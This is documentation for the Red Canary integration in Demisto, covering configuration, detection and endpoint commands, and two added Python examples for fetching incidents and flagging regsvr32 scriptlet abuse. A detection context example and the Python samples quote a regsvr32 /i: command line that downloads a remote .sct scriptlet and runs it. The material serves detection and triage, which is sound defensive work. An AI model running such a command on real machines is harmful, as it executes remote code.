Red Canary

Overview


Red Canary collects endpoint telemetry through Carbon Black Response and CrowdStrike Falcon sensors and normalizes it into a common schema, so that teams can detect, analyze and respond to security incidents. This integration lets Demisto pull Red Canary's confirmed detections in as incidents and act on them: acknowledge a detection, update its remediation state, run a Red Canary playbook against it, and look up the affected endpoint.

Configure RedCanary on Demisto


  1. Navigate to Settings > Integrations > Servers & Services.
  2. Search for RedCanary.
  3. Click Add instance to create and configure a new integration instance.
    • Name: a textual name for the integration instance.
    • Domain: the Red Canary tenant URL (e.g., https://demisto.my.redcanary.co).
    • API Key: the Red Canary API key used to authenticate; treat it as a secret.
    • Fetch incidents: enable to have Demisto pull detections in as incidents (see Fetched Incidents Data).
    • Incident type
    • Use system proxy settings
    • Trust any certificate (not secure): disables TLS certificate validation for the Red Canary connection. Leave it unchecked unless you are knowingly testing against an endpoint without a valid certificate.
  4. Click Test to validate the URLs, token, and connection.

Fetched Incidents Data


  • Type: RedCanaryDetection
  • ID
  • Headline
  • Severity
  • Summary
  • Classification
  • Subclassification
  • Time
  • Acknowledged
  • RemediationStatus

Commands


You can execute these commands from the Demisto CLI, as part of an automation, or in a playbook.
After you successfully execute a command, a DBot message appears in the War Room with the command details.

  1. Acknowledge a detection: redcanary-acknowledge-detection
  2. Update the remediation state of a detection: redcanary-update-remediation-state
  3. Get a list of detections: redcanary-list-detections
  4. Get a list of endpoints: redcanary-list-endpoints
  5. Execute a playbook on a detection: redcanary-execute-playbook
  6. Get an endpoint by endpoint ID: redcanary-get-endpoint
  7. Get a list of detections for an endpoint: redcanary-get-endpoint-detections
  8. Get a detection by the detection ID: redcanary-get-detection

1. Acknowledge a detection


Mark a detection as acknowledged to indicate that it is being handled.

Base Command
redcanary-acknowledge-detection
Input
  • id (required): Detection ID. Can be obtained from the context.
Context Output

There is no context output for this command.

Command Example
!redcanary-acknowledge-detection id=4
Human Readable Output

(screenshot not included)

2. Update the remediation state of a detection


Updates the remediation state of a detection.

Base Command
redcanary-update-remediation-state
Input
  • id (required): Detection ID. Can be obtained from the context.
  • remediation-state (required): How the detection was remediated.
  • comment (optional): Description of why and how the detection was remediated. Ignored when the state is remediated.
Context Output

There is no context output for this command.

Command Example
!redcanary-update-remediation-state id=4 remediation-state=not_remediated_false_positive comment="updated by DBot"
Human Readable Output

(screenshot not included)

3. Get a list of detections


Get a list of confirmed detections.

Base Command
redcanary-list-detections
Input
  • page (optional): Page of results to fetch. Default is the first page.
  • per-page (optional): Number of results to return per page.
Context Output
  • RedCanary.Detection.ID (number): Detection ID.
  • RedCanary.Detection.Headline (string): Human-readable text about the detection.
  • RedCanary.Detection.Severity (string): Severity of the detection (high, medium, or low).
  • RedCanary.Detection.Summary (string): Summary of the detection.
  • RedCanary.Detection.Classification (string): Detection classification.
  • RedCanary.Detection.Subclassification (string): Detection sub-classification.
  • RedCanary.Detection.Time (date): Time the detection was confirmed as a threat by Red Canary.
  • RedCanary.Detection.Acknowledged (boolean): Whether the detection has been acknowledged.
  • RedCanary.Detection.RemediationStatus (string): Current remediation state of the detection.
  • RedCanary.Detection.Reason (string): Reason for the detection.
  • RedCanary.Detection.EndpointUserID (number): ID of the user on the affected endpoint.
  • RedCanary.Detection.EndpointID (number): ID of the affected endpoint.
  • Endpoint.Hostname (string): Fully-qualified endpoint hostname.
  • Endpoint.ID (string): Endpoint ID.
  • Endpoint.IPAddress (unknown): IP address(es) of the endpoint.
  • Endpoint.MACAddress (unknown): MAC address(es) of the endpoint.
  • Endpoint.OS (string): Operating system of the endpoint.
  • Endpoint.OSVersion (string): Full operating system version identifier of the endpoint.
  • Endpoint.Memory (number): Physical memory of the endpoint in bytes.
  • Endpoint.IsIsolated (boolean): Whether the endpoint is currently network isolated.
  • Endpoint.IsDecommissioned (boolean): Whether the endpoint is decommissioned.
  • Account.Username (string): Endpoint user name.
  • Account.Hostname (string): Endpoint host name.
Command Example
!redcanary-list-detections page=1 per-page=1
Context Example
{
    "Account": {
        "Username": "administrator", 
        "Hostname": "demisto-host"
    }, 
    "Endpoint": {
        "MACAddress": [
            "08:29:42:f0:b3:7c"
        ], 
        "OS": "Windows", 
        "Hostname": "demisto-host", 
        "IsDecommissioned": true, 
        "IsIsolated": true, 
        "OSVersion": "Windows Server 2016 Server Datacenter, 64-bit", 
        "IPAddress": [
            "181.61.87.106"
        ], 
        "ID": 2
    }, 
    "RedCanary": {
        "Detection": [
            {
                "Severity": "medium", 
                "Classification": "Suspicious Activity", 
                "Acknowledged": true, 
                "Subclassification": [
                    "Process"
                ], 
                "Summary": "The Windows Task Scheduler Configuration Tool was launched via command prompt and leveraged to create multiple suspicious scheduled tasks.", 
                "Headline": "[DEM-6] Suspicious Activity (Process)", 
                "Time": "2018-09-12T15:38:17Z", 
                "Type": "RedCanaryDetection", 
                "ID": 6
            }
        ]
    }
}
Human Readable Output

(screenshot not included)
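The page/per-page arguments of redcanary-list-detections are also what a fetch-incidents pass has to drive, and the practical problem there is idempotency: a detection must become exactly one incident even though every fetch re-reads the same pages. The following Python is an added example, not the integration's own code. It pages through detections with a constructed in-memory client that stands in for the Red Canary API, maps each detection (using the RedCanary.Detection field names documented above) to a Demisto incident dict with the severity mapped to Demisto's numeric scale, and carries the newest confirmation Time plus the IDs already ingested at that exact Time between runs so that nothing is duplicated or dropped. The sample detections, the client, and the last_run shape are all assumptions made for the example.

```python
"""Idempotent fetch of Red Canary detections as Demisto incidents.

Added example, not the integration's own code. A constructed in-memory
client stands in for the Red Canary API; detection records use the
RedCanary.Detection field names documented on this page.
"""
import json
from datetime import datetime, timezone

# Demisto incident severity scale: 1 = Low, 2 = Medium, 3 = High, 0 = Unknown.
# Compared case-insensitively because the page shows both "High" and "medium".
SEVERITY_MAP = {"low": 1, "medium": 2, "high": 3}
TIME_FMT = "%Y-%m-%dT%H:%M:%SZ"

# Constructed sample detections (IDs 4 and 6 mirror the page's examples).
SAMPLE_DETECTIONS = [
    {"ID": 4, "Headline": "[DEM-4] Malicious Software", "Severity": "medium",
     "Classification": "Malicious Software", "Subclassification": [],
     "Summary": "Regsvr32 used to download and run Atomic Red Team code.",
     "Time": "2018-09-12T11:15:55Z", "Acknowledged": False,
     "RemediationStatus": "not_remediated"},
    {"ID": 6, "Headline": "[DEM-6] Suspicious Activity (Process)", "Severity": "medium",
     "Classification": "Suspicious Activity", "Subclassification": ["Process"],
     "Summary": "schtasks.exe used to create multiple suspicious scheduled tasks.",
     "Time": "2018-09-12T15:38:17Z", "Acknowledged": True,
     "RemediationStatus": "remediated"},
    {"ID": 7, "Headline": "[DEM-7] Malicious Software", "Severity": "High",
     "Classification": "Malicious Software", "Subclassification": [],
     "Summary": "Constructed high-severity detection.",
     "Time": "2018-09-13T08:02:10Z", "Acknowledged": False,
     "RemediationStatus": "not_remediated"},
]


class FakeRedCanaryClient:
    """Pages through detections the way redcanary-list-detections does
    (page/per-page). Order is by ID only, not by time."""

    def __init__(self, detections, per_page=2):
        self._detections = sorted(detections, key=lambda d: d["ID"])
        self.per_page = per_page

    def list_detections(self, page):
        start = (page - 1) * self.per_page
        return self._detections[start:start + self.per_page]


def parse_time(value):
    return datetime.strptime(value, TIME_FMT).replace(tzinfo=timezone.utc)


def detection_to_incident(det):
    """Shape a detection into the dict fetch-incidents hands to Demisto."""
    return {
        "name": det["Headline"],
        "occurred": det["Time"],
        "severity": SEVERITY_MAP.get(str(det.get("Severity", "")).lower(), 0),
        "type": "RedCanaryDetection",
        "rawJSON": json.dumps(det),
    }


def fetch_incidents(client, last_run):
    """One fetch pass.

    last_run (assumed shape) carries the newest confirmation Time from the
    previous pass and the IDs already ingested at exactly that Time, so
    detections confirmed in the same second are neither lost nor duplicated.
    Every page is walked because the page does not state the API's sort order.
    """
    last_time = parse_time(last_run.get("time", "1970-01-01T00:00:00Z"))
    seen_ids = set(last_run.get("ids", []))
    newest_time, newest_ids = last_time, set(seen_ids)
    incidents, page = [], 1
    while True:
        batch = client.list_detections(page)
        if not batch:
            break
        for det in batch:
            t = parse_time(det["Time"])
            if t < last_time or (t == last_time and det["ID"] in seen_ids):
                continue  # already ingested on a previous run
            incidents.append(detection_to_incident(det))
            if t > newest_time:
                newest_time, newest_ids = t, {det["ID"]}
            elif t == newest_time:
                newest_ids.add(det["ID"])
        page += 1
    return incidents, {"time": newest_time.strftime(TIME_FMT),
                       "ids": sorted(newest_ids)}
```

Running fetch_incidents twice with the returned last_run yields three incidents the first time and none the second; a fourth detection confirmed in the same second as the newest one is picked up on the next run without re-creating the earlier ones. If you know the API returns detections newest-first, the loop can stop at the first detection older than last_time instead of walking every page.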

4. Get a list of endpoints


Returns a list of endpoints.

Base Command
redcanary-list-endpoints
Input
  • page (optional): Page number in the query response. Default is 1.
  • per-page (optional): Number of results per page. Default is 50.
Context Output
  • Endpoint.Hostname (string): Fully-qualified endpoint hostname.
  • Endpoint.ID (string): Endpoint ID.
  • Endpoint.IPAddress (unknown): IP address(es) of the endpoint.
  • Endpoint.MACAddress (unknown): MAC address(es) of the endpoint.
  • Endpoint.OS (string): Operating system of the endpoint.
  • Endpoint.OSVersion (string): Full operating system version identifier of the endpoint.
  • Endpoint.Memory (number): Physical memory of the endpoint in bytes.
  • Endpoint.IsIsolated (boolean): Whether the endpoint is currently network isolated.
  • Endpoint.IsDecommissioned (boolean): Whether the endpoint is decommissioned.
Command Example
!redcanary-list-endpoints
Context Example
{
    "EndPoint": [
        {
            "MACAddress": [
                "06:79:02:e0:b0:7c"
            ], 
            "OS": "Windows", 
            "Hostname": "ec2amaz-tmlcd45", 
            "IsDecommissioned": true, 
            "IsIsolated": true, 
            "OSVersion": "Windows Server 2016 Server Datacenter, 64-bit", 
            "IPAddress": [
                "172.31.37.106"
            ], 
            "ID": 2
        }
    ]
}
Note that this example writes the top-level key as EndPoint, while the documented context path is Endpoint. Check which key your installed version of the integration actually writes before referencing it in a playbook.
Human Readable Output

(screenshot not included)

5. Execute a playbook on a detection


Execute a predefined playbook on a detection.

Base Command
redcanary-execute-playbook
Input
  • playbook-id (optional): ID of the Red Canary playbook to execute.
  • detection-id (required): ID of the detection to execute the playbook on. Can be retrieved from the context.
  • playbook-name (optional): Name of the playbook to execute. Ignored if playbook-id is specified. Supply either playbook-id or playbook-name.
Context Output

There is no context output for this command.

Command Example
!redcanary-execute-playbook detection-id=4 playbook-name=Isolate
Human Readable Output

(screenshot not included)

6. Get an endpoint by the endpoint ID


Get an endpoint by the endpoint ID.

Base Command
redcanary-get-endpoint
Input
  • id (required): Endpoint ID.
Context Output
  • Endpoint.Hostname (string): Fully-qualified endpoint hostname.
  • Endpoint.ID (string): Endpoint ID.
  • Endpoint.IPAddress (unknown): IP address(es) of the endpoint.
  • Endpoint.MACAddress (unknown): MAC address(es) of the endpoint.
  • Endpoint.OS (string): Operating system of the endpoint.
  • Endpoint.OSVersion (string): Full operating system version identifier of the endpoint.
  • Endpoint.Memory (number): Physical memory of the endpoint in bytes.
  • Endpoint.IsIsolated (boolean): Whether the endpoint is currently network isolated.
  • Endpoint.IsDecommissioned (boolean): Whether the endpoint is decommissioned.
Command Example
!redcanary-get-endpoint id=2
Context Example
{
    "EndPoint": [
        {
            "MACAddress": [
                "06:79:02:e0:b0:7c"
            ], 
            "OS": "Windows", 
            "Hostname": "ec2amaz-tmlcd45", 
            "IsDecommissioned": true, 
            "IsIsolated": true, 
            "OSVersion": "Windows Server 2016 Server Datacenter, 64-bit", 
            "IPAddress": [
                "172.31.37.106"
            ], 
            "ID": 2
        }
    ]
}
Human Readable Output

(screenshot not included)

7. Get a list of detections for an endpoint


Get a list of detections associated with the endpoint.

Base Command
redcanary-get-endpoint-detections
Input
  • id (required): Endpoint ID.
Context Output
  • RedCanary.Detection.ID (number): Detection ID.
  • RedCanary.Detection.Headline (string): Human-readable text about the detection.
  • RedCanary.Detection.Severity (string): Severity of the detection (high, medium, or low).
  • RedCanary.Detection.Summary (string): Summary of the detection.
  • RedCanary.Detection.Classification (string): Detection classification.
  • RedCanary.Detection.Subclassification (string): Detection sub-classification.
  • RedCanary.Detection.Time (date): Time the detection was confirmed as a threat by Red Canary.
  • RedCanary.Detection.Acknowledged (boolean): Whether the detection has been acknowledged.
  • RedCanary.Detection.RemediationStatus (string): Current remediation state of the detection.
  • Endpoint.Hostname (string): Fully-qualified endpoint hostname.
  • Endpoint.ID (string): Endpoint ID.
  • Endpoint.IPAddress (unknown): IP address(es) of the endpoint.
  • Endpoint.MACAddress (unknown): MAC address(es) of the endpoint.
  • Endpoint.OS (string): Operating system of the endpoint.
  • Endpoint.OSVersion (string): Full operating system version identifier of the endpoint.
  • Endpoint.Memory (number): Physical memory of the endpoint in bytes.
  • Endpoint.IsIsolated (boolean): Whether the endpoint is currently network isolated.
  • Endpoint.IsDecommissioned (boolean): Whether the endpoint is decommissioned.
  • Account.Username (string): Endpoint user name.
  • Account.Hostname (string): Endpoint host name.
Command Example
!redcanary-get-endpoint-detections id=4
Context Example
{
    "Account": {
        "Username": "administrator", 
        "Hostname": "demisto-host"
    }, 
    "Endpoint": {
        "MACAddress": [
            "08:29:42:f0:b3:7c"
        ], 
        "OS": "Windows", 
        "Hostname": "demisto-host", 
        "IsDecommissioned": true, 
        "IsIsolated": true, 
        "OSVersion": "Windows Server 2016 Server Datacenter, 64-bit", 
        "IPAddress": [
            "181.61.87.106"
        ], 
        "ID": 2
    }, 
    "RedCanary": {
        "Detection": [
            {
                "Severity": "medium", 
                "Classification": "Suspicious Activity", 
                "Acknowledged": true, 
                "Subclassification": [
                    "Process"
                ], 
                "Summary": "The Windows Task Scheduler Configuration Tool was launched via command prompt and leveraged to create multiple suspicious scheduled tasks.", 
                "Headline": "[DEM-6] Suspicious Activity (Process)", 
                "Time": "2018-09-12T15:38:17Z", 
                "Type": "RedCanaryDetection", 
                "ID": 6
            }
        ]
    }
}
Human Readable Output

(screenshot not included)

8. Get a detection by the detection ID


Returns a detection by the detection ID.

Base Command
redcanary-get-detection
Input
  • id (required): Detection ID.
Context Output
  • RedCanary.Detection.ID (number): Detection ID.
  • RedCanary.Detection.Headline (string): Human-readable text about the detection.
  • RedCanary.Detection.Severity (string): Severity of the detection (high, medium, or low).
  • RedCanary.Detection.Summary (string): Summary of the detection.
  • RedCanary.Detection.Classification (string): Detection classification.
  • RedCanary.Detection.Subclassification (string): Detection sub-classification.
  • RedCanary.Detection.Time (date): Time the detection was confirmed as a threat by Red Canary.
  • RedCanary.Detection.Acknowledged (boolean): Whether the detection has been acknowledged.
  • RedCanary.Detection.RemediationStatus (string): Current remediation state of the detection.
  • RedCanary.Detection.Reason (string): Reason for the detection.
  • RedCanary.Detection.EndpointUserID (number): ID of the user on the affected endpoint.
  • RedCanary.Detection.EndpointID (number): ID of the affected endpoint.
  • Endpoint.Hostname (string): Fully-qualified endpoint hostname.
  • Endpoint.ID (string): Endpoint ID.
  • Endpoint.IPAddress (unknown): IP address(es) of the endpoint.
  • Endpoint.MACAddress (unknown): MAC address(es) of the endpoint.
  • Endpoint.OS (string): Operating system of the endpoint.
  • Endpoint.OSVersion (string): Full operating system version identifier of the endpoint.
  • Endpoint.Memory (number): Physical memory of the endpoint in bytes.
  • Endpoint.IsIsolated (boolean): Whether the endpoint is currently network isolated.
  • Endpoint.IsDecommissioned (boolean): Whether the endpoint is decommissioned.
  • Account.Username (string): Endpoint user name.
  • Account.Hostname (string): Endpoint host name.
  • Domain.Name (string): Domain name.
  • File.Name (string): File name.
  • File.MD5 (string): File MD5 hash.
  • File.SHA256 (string): File SHA-256 hash.
  • File.Path (string): File path on the endpoint.
  • File.Extension (string): File extension.
  • IP.Address (string): IP address.
  • IP.Port (string): Port.
  • Process.Name (string): Process name.
  • Process.Path (string): Process binary path.
  • Process.MD5 (string): Binary MD5 hash.
  • Process.SHA256 (string): Binary SHA-256 hash.
  • Process.StartTime (date): Process execution time.
  • Process.CommandLine (string): Process command line.
Command Example
!redcanary-get-detection id=4
Context Example
{
    "Account": {
        "Username": "administrator", 
        "Hostname": "ec2amaz-tmlcd45"
    }, 
    "Endpoint": {
        "MACAddress": [
            "06:79:02:e0:b0:7c"
        ], 
        "OS": "Windows", 
        "Hostname": "ec2amaz-tmlcd45", 
        "IsDecommissioned": false, 
        "IsIsolated": true, 
        "OSVersion": "Windows Server 2016 Server Datacenter, 64-bit", 
        "IPAddress": [
            "172.31.37.106"
        ], 
        "ID": 4
    }, 
    "Process": {
        "Path": "c:\\windows\\system32\\regsvr32.exe", 
        "CommandLine": "regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", 
        "Name": "c:\\windows\\system32\\regsvr32.exe", 
        "StartTime": "2018-09-12T11:30:23Z", 
        "MD5": "8cf9086be38a15e905924b4a45d814d9"
    }, 
    "IP": {
        "Port": 443, 
        "Address": "151.101.12.133"
    }, 
    "Domain": {
        "Name": "raw.githubusercontent.com"
    }, 
    "RedCanary": {
        "Detection": {
            "Severity": "medium", 
            "Classification": "Malicious Software", 
            "Headline": "[DEM-4] Malicious Software", 
            "Acknowledged": false, 
            "Summary": "An instance of `Regsvr32` was leveraged to download Atomic Red Team code and execute it on this system.", 
            "Time": "2018-09-12T11:15:55Z", 
            "Type": "RedCanaryDetection", 
            "ID": 4
        }
    }, 
    "File": [
        {
            "Path": "c:\\windows\\explorer.exe", 
            "Name": "c:\\windows\\explorer.exe", 
            "Extension": ".exe", 
            "MD5": "a7190e945f2d00fe4af31289f4e64b8c"
        }
    ]
}
Human Readable Output

(screenshot not included)
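The Process context in the example above shows what sits behind a Red Canary "Malicious Software" detection: regsvr32.exe invoked with /s /u /i:<URL> and scrobj.dll, which makes the scriptlet host (scrobj.dll) fetch and run a remote .sct file. The following Python is an added example, not part of the integration. It shows a post-processing check a playbook could run over Process context entries of the shape redcanary-get-detection returns: it parses the command line, confirms the remote-scriptlet pattern, extracts the scriptlet URL and host, and cross-references that host against the Domain.Name values from the same detection. The sample entries are constructed (the first mirrors the page's example); the function names and the returned field names are assumptions.

```python
"""Post-processing check for regsvr32 remote-scriptlet execution.

Added example, not part of the integration. It inspects Process context
entries of the shape returned by redcanary-get-detection and flags the
regsvr32 /i:<target> ... scrobj.dll pattern; sample entries are constructed.
"""
import re
import shlex
from urllib.parse import urlparse

# regsvr32 accepts /i:<arg> or -i:<arg>; the argument is handed to the
# DllInstall entry point, and scrobj.dll treats it as a scriptlet location.
INSTALL_ARG = re.compile(r"^[/-]i:(?P<target>.+)$", re.IGNORECASE)

# Constructed Process context entries; the first mirrors the page's example.
SAMPLE_PROCESSES = [
    {"Name": "c:\\windows\\system32\\regsvr32.exe",
     "CommandLine": "regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/"
                    "redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"},
    {"Name": "c:\\windows\\system32\\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s C:\\Windows\\System32\\msxml3.dll"},  # benign registration
    {"Name": "c:\\windows\\system32\\regsvr32.exe",
     "CommandLine": "regsvr32 /s /i:C:\\Users\\Public\\update.sct scrobj.dll"},  # local scriptlet
]


def _basename(token):
    """Last path component, lower-cased, with quotes and either slash style removed."""
    return token.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_regsvr32(cmdline):
    """Return details of a scriptlet-loading regsvr32 invocation, else None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes
    except ValueError:
        argv = cmdline.split()
    if not argv or _basename(argv[0]) not in ("regsvr32.exe", "regsvr32"):
        return None
    target, loads_scrobj, silent, unregister = None, False, False, False
    for tok in argv[1:]:
        tok = tok.strip('"')
        m = INSTALL_ARG.match(tok)
        if m:
            target = m.group("target").strip('"')
        elif _basename(tok) == "scrobj.dll":
            loads_scrobj = True
        elif tok.lower() == "/s":
            silent = True
        elif tok.lower() == "/u":
            unregister = True
    if target is None or not loads_scrobj:
        return None  # ordinary DLL (un)registration, not the scriptlet pattern
    parsed = urlparse(target)  # a local path like C:\... parses with scheme "c", not http(s)
    return {
        "target": target,
        "remote": parsed.scheme.lower() in ("http", "https"),
        "host": parsed.hostname,
        "silent": silent,
        "unregister": unregister,
    }


def triage(process_entries, domain_names=()):
    """Run the check over Process context entries and note whether the
    scriptlet host also appears among the detection's Domain.Name values."""
    known = set(domain_names)
    findings = []
    for entry in process_entries:
        hit = analyze_regsvr32(entry.get("CommandLine", ""))
        if hit is None:
            continue
        hit["process"] = entry.get("Name")
        hit["host_in_domain_context"] = hit["host"] in known
        findings.append(hit)
    return findings
```

On the three constructed entries, triage() reports two findings: the page's command line (remote, host raw.githubusercontent.com, which matches the Domain.Name in the same detection) and the local .sct variant (not remote, no host), while the plain DLL registration is ignored. Keying the check on the /i: argument plus scrobj.dll rather than on a URL alone is what lets it catch the local-file variant too.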